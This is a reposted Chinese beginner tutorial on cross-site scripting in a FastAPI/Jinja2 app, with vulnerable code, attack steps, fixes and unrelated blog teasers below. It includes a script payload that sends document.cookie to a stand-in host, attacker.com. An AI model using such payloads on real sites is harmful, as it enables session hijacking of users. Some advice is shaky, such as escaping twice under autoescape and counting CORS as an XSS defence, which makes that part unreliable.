安全小白入门(2)-----跨站脚本(XSS)

作者:天下不喵日期:2025/11/24

跨站脚本(XSS)

1. 漏洞原理

XSS 是由于 用户输入的恶意脚本未被转义,直接在浏览器中执行,导致攻击者窃取 Cookie、伪造身份或钓鱼。FastAPI 虽以 JSON 接口为主,但若返回 HTML 内容(如模板渲染)或前端直接渲染 API 返回的用户输入,仍可能触发 XSS。

2. 攻击场景(FastAPI 漏洞代码)

假设 FastAPI 接口返回包含用户输入的 HTML 页面(使用 Jinja2 模板):

1from fastapi import FastAPI, Request
2from fastapi.templating import Jinja2Templates
3
4app = FastAPI()
5templates = Jinja2Templates(directory="templates")
6
7# 漏洞接口:未转义用户输入,直接渲染到HTML
8@app.get("/welcome")
9def welcome(request: Request, username: str):
10    # 危险!username直接拼接进HTML,若包含脚本会执行
11    return templates.TemplateResponse("welcome.html", {
12        "request": request,
13        "username": username  # 攻击者可构造username=<script>恶意代码</script>
14    })
15

对应的templates/welcome.html模板:

1<!DOCTYPE html>
2<html>
3<head>
4    <title>Welcome</title>
5</head>
6<body>
7    <!-- 未转义渲染用户输入 -->
8    <h1>Welcome, {{ username }}!</h1>
9</body>
10</html>
11

攻击步骤:

  1. 攻击者访问接口,构造恶意username/welcome?username=<script>alert('XSS')</script>
  2. 浏览器渲染页面时, <script>标签被执行,弹出 “XSS” 提示(简单演示)。
  3. 进阶攻击:窃取 Cookie 并发送到攻击者服务器:/welcome?username=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>)若用户已登录,Cookie 包含会话信息,攻击者可劫持会话。

3. 防护方案(修复代码 + 最佳实践)

核心原则:对用户输入进行 HTML 转义,或避免在 HTML 中直接渲染用户输入

修复方案 1:模板自动转义(Jinja2 默认开启)

Jinja2 模板默认会对{{ variable }}进行 HTML 转义(将<转义为&lt;>转义为&gt;等),恶意脚本会被当作普通文本显示。上述代码无需修改,Jinja2 已自动防护 —— 若用户输入<script>,会被转义为&lt;script&gt;,不会执行。

修复方案 2:手动转义(若需自定义渲染)

若使用其他模板引擎或手动拼接 HTML,需手动转义用户输入(使用html模块):

1import html
2
3@app.get("/welcome")
4def welcome(request: Request, username: str):
5    # 手动转义用户输入,确保安全
6    safe_username = html.escape(username)
7    return templates.TemplateResponse("welcome.html", {
8        "request": request,
9        "username": safe_username
10    })
11

额外防护:

  • 避免返回 HTML:FastAPI 优先使用 JSON 接口,前端通过 JavaScript 渲染数据(JSON 不会执行脚本)。
  • 设置安全响应头:通过fastapi.middleware.cors.CORSMiddleware限制跨域,或添加Content-Security-Policy(CSP)头,禁止加载外部脚本。

安全小白入门(2)-----跨站脚本(XSS)》 是转载文章,点击查看原文


相关推荐


大数据-160 Apache Kylin Cube 实战:从建模到构建与查询(含踩坑与优化)
武子康2025/11/22

TL;DR 场景:以电商销售事实表为例,在 Kylin 上按“日期”维度预计算加速聚合查询。 结论:合理裁剪 Cuboid、优化维度/事实表可在存储与性能间取得平衡;构建与查询链路跑通。 产出:项目/数据源/模型/Cube 全流程指引、监控与常见错误定位表、实操 SQL 示例。 版本矩阵 模块技术要点工程化建议数据源准备Hive表结构设计,分区字段选择维度表主键唯一,单表≤300MB;事实表


考研408笔记——数据结构
烧冻鸡翅QAQ2025/11/20

文章目录 数据结构什么是置换选择排序?置换选择排序是用来干啥的?什么是最佳归并树?最佳归并树是用来干什么的?什么是败者树?败者树是用来干什么的?什么是十字链表?什么是多重邻接表?二者有啥区别?迪杰斯特拉算法:用贪心策略求解图中单源最短路径问题最小生成树(MST)什么是最小生成树呢?怎么求最小生成树?Prim算法Kruskal算法 弗洛伊德算法:用动态规划思想求解图中任意两点之间的最短路径弗洛伊德算法 vs 迪杰斯特拉算法堆排序什么是大根堆?什么是小根堆?如何利用堆来进行排序?如何用堆排序


playwright的调试模式,方便调试selector, locator语法及查找效果
yeyong2025/11/19

下面是一套“边写边测”的通用套路,确保 page.locator() / wait_for_selector() 在提交代码前就能一次跑通,不用每次都重跑完整流程。 官方“秒测”工具:Playwright Inspector 命令行里加 --paused 即可打开自带调试器: # Python 例子 PWDEBUG=1 pytest my_test.py # 或直接 playwright codegen https://your-site.com 左侧 “Pick” 图标点一下,再点


Langchain Template 全面指南
前端小东2025/11/17

概述 LangChain Template 是 LangChain 提示工程的核心组件,用于动态生成模型的输入。 🎯 Template 的核心概念: Template 本质是一个带有占位符的文本字符串,这些占位符会在运行时被具体的值填充。它的主要目的是将提示逻辑与业务数据分离。 模板分类 1. 🎯 基础模板类(Core Templates) (1) PromptTemplate 最基础的文本模板 from langchain.prompts import PromptTemplate #


蓝桥杯备战记录:图论中关键边识别与DFS应用
akai1472025/11/16

一、问题背景与核心思路 问题描述 给定一个无向连通图和n对点,要求找到一条边,使得删除该边后所有n对点之间的路径都不连通。这类问题在图论中被称为关键边(Bridge)​或必经边问题。 核心算法思想 ​公共边识别​:寻找所有n对点路径上的公共边​边计数法​:统计每条边被多少对点的路径所经过​关键边判定​:计数等于n的边即为所求的关键边 二、DFS实现关键边识别 算法框架 vector<int> adj[MAXN]; // 邻接表存图 int edge_count[MAXN][MA


Jetpack Compose Navigation 2.x 详解
雨白2025/11/15

简单的页面跳转 在 Compose 中,我们可以借助 State 实现一个非常简单的屏幕内容切换效果。 class MainActivity : ComponentActivity() { override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) enableEdgeToEdge() setContent {


深度测评解析 CANN:从 ACL 到自定义算子,解锁昇腾计算的全部潜能
wei_shuo2025/11/14

深度测评解析 CANN:从 ACL 到自定义算子,解锁昇腾计算的全部潜能 CANN 核心价值解读:统一计算底座与全场景适配 ✅端到端栈级支持:CANN 覆盖驱动、运行时、算子加速库、编译器及上层框架适配的全套工具链,大幅降低模型向昇腾硬件移植的工程成本 ✅开发者定制接口:ACL 提供 C/C++、Python 双接口,兼顾快速原型验证与生产级接入;AOL(aclnn)算子性能强,支持两段式调用,方便做内存、离线编译优化 ✅可控资源调度与并发:通过 Device/Context/Stream


Python 的内置函数 input
IMPYLH2025/11/13

Python 内建函数列表 > Python 的内置函数 input Python 的内置函数 input() 是一个用于获取用户输入的标准函数,它会暂停程序执行,等待用户在控制台输入内容并按回车键确认。这个函数在交互式程序和需要用户参与的脚本中非常有用。 基本用法 input() 函数的基本语法如下: user_input = input([prompt]) 其中: prompt 是一个可选参数,用于显示提示信息,告诉用户需要输入什么内容函数返回用户输入的内容,以字符串形式保存


C++笔记——STL list
报错小能手2025/11/11

1. list 基本概念 什么是list? 双向链表:每个元素包含指向前后元素的指针,形成链式结构 核心特性(与vector/deque对比): 特性vectordequelist随机访问✅ O(1)✅ O(1)❌ O(n)头部插入删除❌ O(n)✅ O(1)✅ O(1)尾部插入删除✅ O(1)✅ O(1)✅ O(1)中间插入删除❌ O(n)❌ O(n)✅ O(1)内存布局连续分段连续完全分散 2. list 的基本使用 头文件和声明: cpp #include <list


各个系统的 docker安装
Qayrup2025/11/9

docker简介 Docker 是一组平台即服务的产品,它基于操作系统层级的虚拟化技术,将软件与其依赖项打包为容器。本文将介绍在 CentOS 8 操作系统中安装 Docker 服务,并解决镜像源无法访问的问题。 centos8 安装 1 检查版本 Docker 要求 CentOS 的内核版本至少高于 3.10,可以用命令uname -r查看 2 安装 Docker 所需依赖 //执行命令yum install -y yum-utils device-mapper-persistent-dat

首页编辑器站点地图

本站内容在 CC BY-SA 4.0 协议下发布

Copyright © 2025 聚合阅读